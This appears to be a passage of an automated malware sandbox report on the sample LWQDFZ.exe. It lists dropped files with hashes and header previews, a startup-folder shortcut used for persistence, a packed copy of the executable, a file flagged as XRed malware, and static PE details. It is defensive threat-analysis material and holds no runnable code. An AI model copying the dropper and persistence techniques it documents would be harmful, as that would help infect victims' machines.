                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="K3ir4MkTY8JyQESVkiRWqw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\sJoE4Vb.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.25985960163905
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0XSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Q+pAZewRDK4mW
                                                                                                                    MD5:46892D9636BF3DCBE714EA6CCE3F66D0
                                                                                                                    SHA1:D1D3968F1896993F5D0784A86DBD47278DCAA4F1
                                                                                                                    SHA-256:8160FBE39F95583861CDABFB4BCACB93D047707E3E8E2D8010C87FDCC295A4B1
                                                                                                                    SHA-512:CB0B1B145BECA92E7E882708CF311CA3E9F525EFF5CC00CE11B87EF846E82A61A98CF40F6F655B6EB21B3D40FA20CDA7750FE7246B2D6921FD00CCDA1B8F36AB
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="2KuUUsME0is0ZHYXUtalOg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\sJzYzcd.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.260139820034753
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0CnSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+9n+pAZewRDK4mW
                                                                                                                    MD5:557E8FC6AB2570A0EFD67BED03AA274A
                                                                                                                    SHA1:D6E78FAE25D8A6746343F8B27BEC01C69B4CC42C
                                                                                                                    SHA-256:49FFF059888112167CF7891294E1B5C059C0FCD7BE8457B25ABC03F1FC09FCC0
                                                                                                                    SHA-512:04D46714C5BD9EC70DD5AA190BEAC16DA2A2CFA4376C4E4817AD2AD3EF47FD1EDE2DA8C1A133B71C1E2F90775ECCDB96A6864E5CB15C8DC8B9BAF860F116BF21
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="08Fx3wY7uGMyfJFGmP204g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\sleauig.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.263380267947828
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0PSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Y+pAZewRDK4mW
                                                                                                                    MD5:EC845ABBB18C4824E5293AAC4ADCCEB7
                                                                                                                    SHA1:04E03C8DAFECBCC23FD2A6F48ACB95AD63A08A21
                                                                                                                    SHA-256:A4ECD309B9C46CCACCB7AD2297471557FB420E3AF6B4BC3B38537F438FFD897A
                                                                                                                    SHA-512:F7D613F9FF15D5C999E1500B15277FF8645CE7AA29894099EEADE7699E35E5FE18CF6552E190C8BE4FABD5C74063546AF8D0B0177107FEB81A8472B609633680
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="cq6d7QE-4n8Hd6kUfD4FaA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\ydWZIxg.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.253681541861885
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0ISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+f+pAZewRDK4mW
                                                                                                                    MD5:CD783771A9BB596B0DA3B5BC4A47A26E
                                                                                                                    SHA1:79D8A77361BA19075AD76562DBAA1B7C21919A45
                                                                                                                    SHA-256:7969570988863429EE91C0ED64AEAB64BCA81F322CA7D225E7E8FA384B6CDB77
                                                                                                                    SHA-512:48D6CBDE69B303B3040B4B56F7C54A5CD8324E3CB3CD5A66D3508DFE71EB8267C3A8FB0CE3149240A2E2EBA8E93E73C121F5834614A86618884BC52F3205872F
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="EOwLhu8Qo8Uns0c6_x7lkQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\zG6bOk4.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.2471439141334955
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0VSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+u+pAZewRDK4mW
                                                                                                                    MD5:18BE7CDA70BE14E61C4699CE2A77B86A
                                                                                                                    SHA1:E05A6F7D556992FD7573297A1B7378C85EF2E0FB
                                                                                                                    SHA-256:88BADBF84A5C7BEC99D6435866B101583AC367FA05F682A6C5713446005B960C
                                                                                                                    SHA-512:2E5F7B222E366A7BBE833C7B94A5F2875AF40505A39C52A9BBF85222FEA2C21EDB4322E7A6446EE0C1DC9CCB008B384F289D8A9DA12D39BB4D4A838D1B7738AD
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="zn-5rZ20nbdwv1KhB6Mixw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\zwgtCBd.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.259167163488277
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0BtVSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK++/+pAZewRDK4mW
                                                                                                                    MD5:7E2362FFA54B0CA826C8C8B7D48E71F9
                                                                                                                    SHA1:1CEB612700790C2A026BB6D997BDDE94598A9D2C
                                                                                                                    SHA-256:1DB39C4627CC5EFB9752659F4CCBB644843D4D82AC623CF4E79FE4CC5D1D1EBF
                                                                                                                    SHA-512:68DD0D78DEBB7909906D6E7400C4C4E17805008442928BCF8514F9BF48D443CF2A42974EB94C8427B148E2C94BD82DD3C506305507048C78E446933714CB9C85
                                                                                                                    Malicious:false
                                                                                                                    Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="6MTviuEI5Imgm1H1tTuOsQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                    C:\Users\user\AppData\Local\Temp\~$c2jUHMi5.xlsm

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):165
                                                                                                                    Entropy (8bit):1.3520167401771568
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:qs/FFyGff:qsyWf
                                                                                                                    MD5:5C22367453CA7CD5BD7CA96C4FD55742
                                                                                                                    SHA1:FC7428D064740B4E331D57098AF028AA26FBC1AE
                                                                                                                    SHA-256:F5D3D989BFAC7CF7187B3665F8CB75AF84FD749DBE245E454E2F9F1AC562E543
                                                                                                                    SHA-512:BE2C202040245F25CB24C7F7B44A69F0000A95984236C3AE671443C56A7E1AE05BD7ACED71979ADF1159490770A767D25F581E76540C9C653441558BAECC0C89
                                                                                                                    Malicious:false
                                                                                                                    Preview:.user ..t.i.n.a. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                    C:\Users\user\AppData\Local\Temp\~DFAE14ADF4796882A4.TMP

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):32768
                                                                                                                    Entropy (8bit):3.746897789531007
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
                                                                                                                    MD5:7426F318A20A187D88A6EC88BBB53BAF
                                                                                                                    SHA1:4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
                                                                                                                    SHA-256:9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
                                                                                                                    SHA-512:EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
                                                                                                                    Malicious:false
                                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MHDFGY.lnk

                                                                                                                    Download File
                                                                                                                    Process:C:\Users\user\Desktop\._cache_LWQDFZ.exe
                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=4, Archive, ctime=Mon Dec 30 09:25:13 2024, mtime=Mon Dec 30 09:25:13 2024, atime=Mon Dec 30 09:25:13 2024, length=914944, window=hide
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1802
                                                                                                                    Entropy (8bit):3.415370365583593
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:82pHSzPaZveCydAmwwG8UE2+s9T4Il9SjKm:8XzPO1rmwSGr9MIl0jK
                                                                                                                    MD5:096D98FC40C50B08C2D0844FE598E191
                                                                                                                    SHA1:DDF60CF34A497ED21C639AF981359E4001FE6701
                                                                                                                    SHA-256:1D504C1C4A275C2A9748D72AD119FF1116A6CFDB4BCCCBD6FCC794FC0B9DA07A
                                                                                                                    SHA-512:7DF3DE4A26967579D93752A0FBF6174B35EE30FBCBB1DCD9102E184E818DFD24560D6E2407EDAE2037A0603D83DCFB1FF53FEFD49B983A268BF9F1345A0FA7B9
                                                                                                                    Malicious:false
                                                                                                                    Preview:L..................F.@.. ........Z.......Z.......Z............................:..DG..Yr?.D..U..k0.&...&.......bBDj....)...Z..EP...Z......t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG.Y$S..........................=...A.p.p.D.a.t.a...B.V.1......Y"S..Roaming.@......EWsG.Y"S..........................`...R.o.a.m.i.n.g.....V.1......Y&S..Windata.@......Y&S.Y&S....2)....................`;..W.i.n.d.a.t.a.....`.2......Y'S .KQNALS.exe..F......Y'S.Y'S....N)....................#.s.K.Q.N.A.L.S...e.x.e......._...............-.......^............=.......C:\Users\user\AppData\Roaming\Windata\KQNALS.exe..!.....\.....\.....\.....\.....\.W.i.n.d.a.t.a.\.K.Q.N.A.L.S...e.x.e.(.".C.:.\.U.s.e.r.s.\.t.i.n.a.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.i.n.d.a.t.a.\."...C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.s.h.e.l.l.3.2...d.l.l.........%SystemRoot%\SysWOW64\shell32.dll..................................................................................................................

                                                                                                                    C:\Users\user\AppData\Roaming\Windata\KQNALS.exe

                                                                                                                    Download File
                                                                                                                    Process:C:\Users\user\Desktop\._cache_LWQDFZ.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):914944
                                                                                                                    Entropy (8bit):7.8688917212806055
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24576:KhloDX0XOf4ei4nfi5aPeIL2UkQwaeQnKzHZRdb:KhloJf5fj22pkXaxM
                                                                                                                    MD5:541FC19BE6471027AFB1DD324E4A8A80
                                                                                                                    SHA1:ED39E0A9AA016595F1EAD34C221CE0B878E7CF64
                                                                                                                    SHA-256:0A438A59E23472911FD3E08A50F58CAD8008D01733A1159BB20B06B20B21AAC0
                                                                                                                    SHA-512:DA7965709ADED6570C282E02536E2FCDF51E6A42CED919ADF75BE4FB694017BCD332C229DB4B07684265B471DF6D2001D62A1C5327CD93F35520FF4FAD83E086
                                                                                                                    Malicious:true
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                    • Antivirus: ReversingLabs, Detection: 53%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L...O.hg.........."......P........... .......0....@.......................................@...@.......@.........................$....0..............................................................."..H...........................................UPX0....................................UPX1.....P.......D..................@....rsrc........0.......H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....

                                                                                                                    C:\Users\user\Desktop\._cache_LWQDFZ.exe

                                                                                                                    Download File
                                                                                                                    Process:C:\Users\user\Desktop\LWQDFZ.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):914944
                                                                                                                    Entropy (8bit):7.8688917212806055
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24576:KhloDX0XOf4ei4nfi5aPeIL2UkQwaeQnKzHZRdb:KhloJf5fj22pkXaxM
                                                                                                                    MD5:541FC19BE6471027AFB1DD324E4A8A80
                                                                                                                    SHA1:ED39E0A9AA016595F1EAD34C221CE0B878E7CF64
                                                                                                                    SHA-256:0A438A59E23472911FD3E08A50F58CAD8008D01733A1159BB20B06B20B21AAC0
                                                                                                                    SHA-512:DA7965709ADED6570C282E02536E2FCDF51E6A42CED919ADF75BE4FB694017BCD332C229DB4B07684265B471DF6D2001D62A1C5327CD93F35520FF4FAD83E086
                                                                                                                    Malicious:true
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                    • Antivirus: ReversingLabs, Detection: 53%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L...O.hg.........."......P........... .......0....@.......................................@...@.......@.........................$....0..............................................................."..H...........................................UPX0....................................UPX1.....P.......D..................@....rsrc........0.......H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....

                                                                                                                    C:\Users\user\Documents\AIXACVYBSB\ONBQCLYSPU.xlsm

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:Microsoft Excel 2007+
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):18387
                                                                                                                    Entropy (8bit):7.523057953697544
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                    MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                    SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                    SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                    SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                    Malicious:false
                                                                                                                    Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                                                    C:\Users\user\Documents\AIXACVYBSB\~$ONBQCLYSPU.xlsx

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):165
                                                                                                                    Entropy (8bit):1.3520167401771568
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:qs/FFyGff:qsyWf
                                                                                                                    MD5:5C22367453CA7CD5BD7CA96C4FD55742
                                                                                                                    SHA1:FC7428D064740B4E331D57098AF028AA26FBC1AE
                                                                                                                    SHA-256:F5D3D989BFAC7CF7187B3665F8CB75AF84FD749DBE245E454E2F9F1AC562E543
                                                                                                                    SHA-512:BE2C202040245F25CB24C7F7B44A69F0000A95984236C3AE671443C56A7E1AE05BD7ACED71979ADF1159490770A767D25F581E76540C9C653441558BAECC0C89
                                                                                                                    Malicious:false
                                                                                                                    Preview:.user ..t.i.n.a. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                    C:\Users\user\Documents\AIXACVYBSB\~$cache1

                                                                                                                    Download File
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):771584
                                                                                                                    Entropy (8bit):6.632118854531729
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9ITr:ansJ39LyjbJkQFMhmC+6GD98
                                                                                                                    MD5:84A6CCB0838DA0E05CC6763275C2EE1C
                                                                                                                    SHA1:E2F47601FCAD62183937567210B5062B0750FA70
                                                                                                                    SHA-256:5A2B9944F9C900ABFBBF22B605A6D1770FC3C75456FFF3C0517CAA102C5D8F07
                                                                                                                    SHA-512:063E5F2432DE4D24E6BE92BD50B0E12E12DDB030615809994EE64551E8D03391C807FEE2D95EACF7669BA816981FA9ABF3A4A7B8574AE0634BEB670F015A031C
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\AIXACVYBSB\~$cache1, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\AIXACVYBSB\~$cache1, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                    • Antivirus: ReversingLabs, Detection: 100%
                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                                                    C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1835008
                                                                                                                    Entropy (8bit):4.394167916772136
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:sl4fiJoH0ncNXiUjt10q0G/gaocYGBoaUMMhA2NX4WABlBuNASOBSqa:k4vF0MYQUMM6VFYSSU
                                                                                                                    MD5:498A12F65D0B58058EB8C2E0ABACBFD9
                                                                                                                    SHA1:590A338042A94D3F8F2F172E47CAE66359DDDF21
                                                                                                                    SHA-256:EE715FCB98740A04842B5A53511C182BBADB7022ABCE68FA924376447D39ADA7
                                                                                                                    SHA-512:BC5E10AD5711AE305DBF07C950647F1990DE748BD74ED0B944463E5007D49DC2E9E82EA6F8EF5A05CF63EE13009EAA722776F64328BF75ADAF8B2731D5B2889E
                                                                                                                    Malicious:false
                                                                                                                    Preview:regfH...H....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...?.Z.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    Static File Info

                                                                                                                    General

                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Entropy (8bit):7.462560448742017
                                                                                                                    TrID:
                                                                                                                    • Win32 Executable (generic) a (10002005/4) 93.09%
                                                                                                                    • Win32 Executable Borland Delphi 7 (665061/41) 6.19%
                                                                                                                    • UPX compressed Win32 Executable (30571/9) 0.28%
                                                                                                                    • Win32 EXE Yoda's Crypter (26571/9) 0.25%
                                                                                                                    • Win32 Executable Delphi generic (14689/80) 0.14%
                                                                                                                    File name:LWQDFZ.exe
                                                                                                                    File size:1'686'528 bytes
                                                                                                                    MD5:27bcc0d927e9f13250b1dff9e122e9af
                                                                                                                    SHA1:2f9f09f46fe7ee2a495247292b3f2be0777c2873
                                                                                                                    SHA256:71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1
                                                                                                                    SHA512:1bdf5d3ba61b8d99955b92b87377fcbea08db248aae1089a9028a0613eb06c43e330bd781edf66ec955b1042c811094207b8962e391b37fc516a4b93664c7653
                                                                                                                    SSDEEP:49152:cnsHyjtk2MYC5GDchloJf5fj22pkXaxMa:cnsmtk2alhlyLZ
                                                                                                                    TLSH:A575C02EB1918437D137D6F84F5BB294482BBFF12F25694A3BE83E4C4E392712855293
                                                                                                                    File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                    File Icon

                                                                                                                    Icon Hash:0759fdf4f859738f

                                                                                                                    Static PE Info

                                                                                                                    General

                                                                                                                    Entrypoint:0x49ab80
                                                                                                                    Entrypoint Section:CODE
                                                                                                                    Digitally signed:false
                                                                                                                    Imagebase:0x400000
                                                                                                                    Subsystem:windows gui
                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                    DLL Characteristics:
                                                                                                                    Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                    TLS Callbacks:
                                                                                                                    CLR (.Net) Version:
                                                                                                                    OS Version Major:4
                                                                                                                    OS Version Minor:0
                                                                                                                    File Version Major:4
                                                                                                                    File Version Minor:0
                                                                                                                    Subsystem Version Major:4
                                                                                                                    Subsystem Version Minor:0
